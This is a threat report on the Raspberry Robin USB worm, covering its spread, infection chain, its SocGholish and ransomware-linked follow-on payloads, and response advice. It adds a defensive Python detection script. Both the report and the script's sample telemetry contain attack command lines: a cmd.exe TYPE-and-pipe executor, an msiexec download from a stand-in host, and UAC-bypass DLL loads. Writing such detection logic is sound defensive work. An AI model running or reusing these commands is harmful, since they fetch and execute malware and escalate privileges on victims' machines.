Red Canary started tracking a cluster of worm-like activity in September 2021 that we called Raspberry Robin. We shared our observations on this cluster in a blog published in May 2022. Following our post, other security researchers shared their observations and research findings, expanding the community’s understanding of Raspberry Robin. Since our initial blog publication, Raspberry Robin evolved from a growing curiosity to a widely distributed malicious downloader. Raspberry Robin was Red Canary’s 7th most prevalent threat in 2022.
Raspberry Robin activity observed by Red Canary remained at a fairly consistent frequency between January and June of 2022. In the latter half of 2022, beginning in August, we saw a significant increase in activity. The six-month period of July through December 2022 saw, on average, a 114 percent increase in observed Raspberry Robin activity compared to the first six months of the year. There may be several reasons for this increase, the most likely being both a rise in actual Raspberry Robin infections and improved detection of the threat by Red Canary and other vendors.
Initial Raspberry Robin activity
A Raspberry Robin infection often starts when a user plugs an infected USB drive into their endpoint. Based on community feedback we received after our blog post, one common source for Raspberry Robin infections appears to be USB drives previously used at print shops and mailing centers. After the drive is connected, cmd.exe receives a command that uses TYPE to read a randomly named file with a seemingly random two-to-three character file extension and pipes the file's contents into a second cmd.exe, which executes them. There is frequently additional whitespace in this command, so detection logic should normalize spacing before matching:
cmd.exe /q/V/R TYPE QLiet.sAV|Cmd
The file is a LNK file that contains a distinctive Windows Installer (msiexec.exe) command. The msiexec command typically includes the following:
a short domain containing only a few characters
communication over port 8080
a string of random alphanumeric characters potentially used as a token
the victim hostname and/or username
An example of such a command line appears in the original report as a screenshot, which is not reproduced in this text.
If the outbound network connection is successful, msiexec.exe downloads and installs a randomly named malicious DLL, typically in C:\ProgramData\<randomly-named subdirectory>. The DLL name is two-to-eight random characters followed by a three-character file extension. Extensions we’ve observed include .tmp, .etl, .log, and others, so the file is not named like a DLL at all. The Raspberry Robin DLL, also known as Roshtyak, can be executed by several different processes in an attempt to elevate privileges and bypass User Account Control (UAC), depending on which type of evasion is most likely to succeed. Red Canary has observed fodhelper.exe (an auto-elevating Windows binary) and odbcconf.exe used to execute the malicious DLL.
The DLL has a wide variety of functions, including additional C2 activity, scheduled task creation for persistence, and the capability to download and execute additional payloads. In July 2022, Microsoft reported seeing SocGholish as a follow-on payload, observing activity resembling the group they track as DEV-0243, which is associated with the cybercriminal group known as Evil Corp. Red Canary also directly observed Raspberry Robin downloading a malicious SocGholish .js file. This development significantly heightened the risk of a Raspberry Robin infection, making it a potential ransomware precursor based on historic DEV-0243 and SocGholish activity. In October 2022, Microsoft shared additional Raspberry Robin observations, most notably that they saw Raspberry Robin used in compromises with follow-on activity including BumbleBee, Cobalt Strike, and IcedID. Microsoft additionally reported that Raspberry Robin was observed in post-compromise activity attributed to DEV-0950, a group that overlaps with activity tracked as TA505.
If Raspberry Robin is detected in your environment, we recommend taking steps to block malicious network connections to help prevent follow-on activity and the download of malicious files. We also recommend removing malicious files from the infected system. If additional follow-on activity is detected in your environment, we recommend that you isolate the device. Rapid detection and response early in the infection chain prevents continued progression of this threat.
Windows Installer (msiexec.exe) downloading and executing packages
To detect suspicious use of msiexec.exe by Raspberry Robin or other threats, it’s essential to examine the command line and, in particular, the URL it carries. Detecting msiexec.exe that is passed a URL on the command line and then makes an outbound network connection to download and install a package gives you the opportunity to examine the activity and determine whether it’s malicious. Legitimate software deployment also installs packages from URLs with msiexec, so baseline the domains, ports, and package names your environment normally uses and treat the traits above (a short domain, port 8080, a random token, and the victim hostname or username in the URL) as the signal that separates Raspberry Robin from routine installs.
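The following is an added example, not code from the Red Canary report, showing how the three observable stages described above (the cmd.exe TYPE-and-pipe command, the msiexec.exe download with its URL traits, and the dropped payload in C:\ProgramData executed through a UAC-bypass binary) can be turned into detection logic run over process-creation telemetry. The event shape, the sample command lines, the domain ab.cd, the token, the paths, and the scoring threshold (a remote package plus at least two other traits) are all constructed assumptions for illustration; only the traits themselves come from the report.

```python
import re
from dataclasses import dataclass
from urllib.parse import urlparse

# Minimal shape of a process-creation event (Sysmon EID 1 / EDR telemetry); an assumption.
# hostname/username are the victim's, so they can be recognised inside the msiexec URL.
@dataclass
class ProcessEvent:
    image: str            # binary name, e.g. "msiexec.exe"
    parent: str           # parent binary name
    cmdline: str          # full command line as logged
    hostname: str = ""    # endpoint name
    username: str = ""    # logged-on user

# Stage 1: cmd.exe reading a file with TYPE and piping its contents into a second cmd.
# Whitespace is collapsed first because the observed command lines pad it irregularly.
TYPE_PIPE_RE = re.compile(r"\btype\s+\S+\s*\|\s*cmd\b", re.IGNORECASE)

def is_cmd_type_pipe(ev: ProcessEvent) -> bool:
    if ev.image.lower() != "cmd.exe":
        return False
    return TYPE_PIPE_RE.search(" ".join(ev.cmdline.split())) is not None

# Stage 2: msiexec.exe pulling a package from a URL. Each trait from the report is
# checked separately so an analyst can see which ones fired.
URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)
TOKEN_RE = re.compile(r"[A-Za-z0-9]{10,}")   # "random token" length threshold: an assumption

def msiexec_traits(ev: ProcessEvent) -> dict:
    traits = dict(remote_package=False, short_domain=False, port_8080=False,
                  token=False, host_or_user=False)
    if ev.image.lower() != "msiexec.exe":
        return traits
    m = URL_RE.search(ev.cmdline)
    if not m:
        return traits
    traits["remote_package"] = True
    url = urlparse(m.group(0))
    labels = (url.hostname or "").split(".")
    # short domain: registrable label of only a few characters, e.g. ab.cd
    traits["short_domain"] = len(labels) >= 2 and len(labels[-2]) <= 4
    traits["port_8080"] = url.port == 8080
    tail = url.path + url.query
    traits["token"] = TOKEN_RE.search(tail) is not None
    traits["host_or_user"] = any(v and v.lower() in tail.lower()
                                 for v in (ev.hostname, ev.username))
    return traits

def is_raspberry_robin_msiexec(ev: ProcessEvent) -> bool:
    t = msiexec_traits(ev)
    # remote package plus at least two further traits (threshold is an assumption)
    return t["remote_package"] and sum(v for k, v in t.items() if k != "remote_package") >= 2

# Stage 3: payload at C:\ProgramData\<random dir>\<2-8 chars>.<3-char ext>, referenced by
# a UAC-bypass host binary or by a child it spawned.
DROP_PATH_RE = re.compile(
    r"c:\\programdata\\[^\\\s]+\\[a-z0-9]{2,8}\.[a-z0-9]{3}\b", re.IGNORECASE)
UAC_BYPASS_HOSTS = {"fodhelper.exe", "odbcconf.exe"}

def is_programdata_payload_load(ev: ProcessEvent) -> bool:
    involved = {ev.image.lower(), ev.parent.lower()} & UAC_BYPASS_HOSTS
    return bool(involved) and DROP_PATH_RE.search(ev.cmdline) is not None

def triage(events):
    """Return (stage, cmdline) for every event that matches a stage of the chain."""
    hits = []
    for ev in events:
        if is_cmd_type_pipe(ev):
            hits.append(("stage1-cmd-type-pipe", ev.cmdline))
        elif is_raspberry_robin_msiexec(ev):
            hits.append(("stage2-msiexec-download", ev.cmdline))
        elif is_programdata_payload_load(ev):
            hits.append(("stage3-uac-bypass-dll", ev.cmdline))
    return hits

# Constructed sample telemetry (not real captures); domain, token, paths and names are made up.
SAMPLE_EVENTS = [
    ProcessEvent("cmd.exe", "explorer.exe", "cmd.exe  /q/V/R   TYPE  QLiet.sAV | Cmd"),
    ProcessEvent("msiexec.exe", "cmd.exe",
                 "msiexec /q /i http://ab.cd:8080/AbCdEfGhIjKl=DESKTOP-1234/jsmith",
                 hostname="DESKTOP-1234", username="jsmith"),
    ProcessEvent("msiexec.exe", "explorer.exe",          # benign remote install, should not fire
                 "msiexec /i https://download.example.com/agent.msi /qn"),
    ProcessEvent("odbcconf.exe", "cmd.exe", r"odbcconf.exe /a {regsvr C:\ProgramData\Xk3v\ab.tmp}"),
    ProcessEvent("rundll32.exe", "fodhelper.exe", r"rundll32.exe C:\ProgramData\Qz9\abcdefgh.etl,Start"),
]

if __name__ == "__main__":
    for stage, cmd in triage(SAMPLE_EVENTS):
        print(f"{stage:26} {cmd}")
```

The benign msiexec event is included deliberately: it carries a URL, so it is a "remote package", but none of the other traits fire and it is not reported. In production the trait checks would be tuned against your own deployment tooling, and the stage-3 rule extended with any other auto-elevating binaries your EDR shows loading files from ProgramData.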